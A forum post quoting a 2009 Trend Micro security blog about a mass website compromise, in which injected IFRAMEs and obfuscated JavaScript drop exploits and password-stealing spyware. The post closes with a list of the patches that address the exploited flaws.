FYI...
- http://blog.trendmicro.com/another-w...info-stealers/
June 6, 2009 - "Aside from Gumblar, another incident of mass compromised web sites have been seen in the wild lately, and has raised as much concern as the former. This one starts with the same technique: a malicious IFRAME unknowingly embedded in a legitimate website, injected via JavaScript. The said IFRAME redirects to another IFRAME, which in turn executes obfuscated JavaScript code. Once decoded, it tries to connect to URLs to download exploits for several vulnerabilites in order to gain access of the affected user’s system. The obfuscated malicious JavaScript is detected as JS_DROPPER.LOK while the URLs that trigger the download of the exploits are detected as TROJ_SHELLCOD.HT. Upon successful exploitation, other malicious files are then downloaded, which Trend Micro detects as TROJ_MEDPINCH.B, and TROJ_MEDPINCH.A. TROJ_MEDPINCH.B connects to other URLs to download info-stealers SPYW_IEWATCHER and TSPY_LDPINCH.CBS. On the other hand, TROJ_MEDPINCH.A drops yet another info-stealer: TSPY_LDPINCH.ASG. TSPY_LDPINCH.ASG steals account information related to the following applications: This spyware steals user names, passwords, and other account and installation information of the following applications:
• INETCOMM Server
• Microsoft Outlook
• Mirabilis ICQ
• Opera Software
• The Bat!
• Total Commander
• Trillian
Though this compromise occurs within close proximity days after Gumblar’s last attack, no mention of the Gumblar.{BLOCKED} domain appears in the code. This attack may indeed be a separate one from Gumblar, or possibly be inspired by it. Related URLs are already blocked by the Smart Protection Network, but it is highly advised that user’s patch their system to minimize the chances of exploit through the following updates:
* Vulnerability in Windows Explorer Could Allow Remote Execution MS06-057
- http://www.microsoft.com/technet/sec.../ms06-057.mspx
* Buffer overflow in Apple QuickTime 7.1.3
- http://cve.mitre.org/cgi-bin/cvename...=CVE-2007-0015
* Buffer overflow in the WZFILEVIEW.FileViewCtrl.61 ActiveX control
- http://cve.mitre.org/cgi-bin/cvename...=CVE-2006-6884
* Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution - MS06-014
- http://www.microsoft.com/technet/sec.../MS06-014.mspx
* Microsoft Internet Explorer 7 Memory Corruption Exploit - MS09-002
- http://www.microsoft.com/technet/sec.../MS09-002.mspx "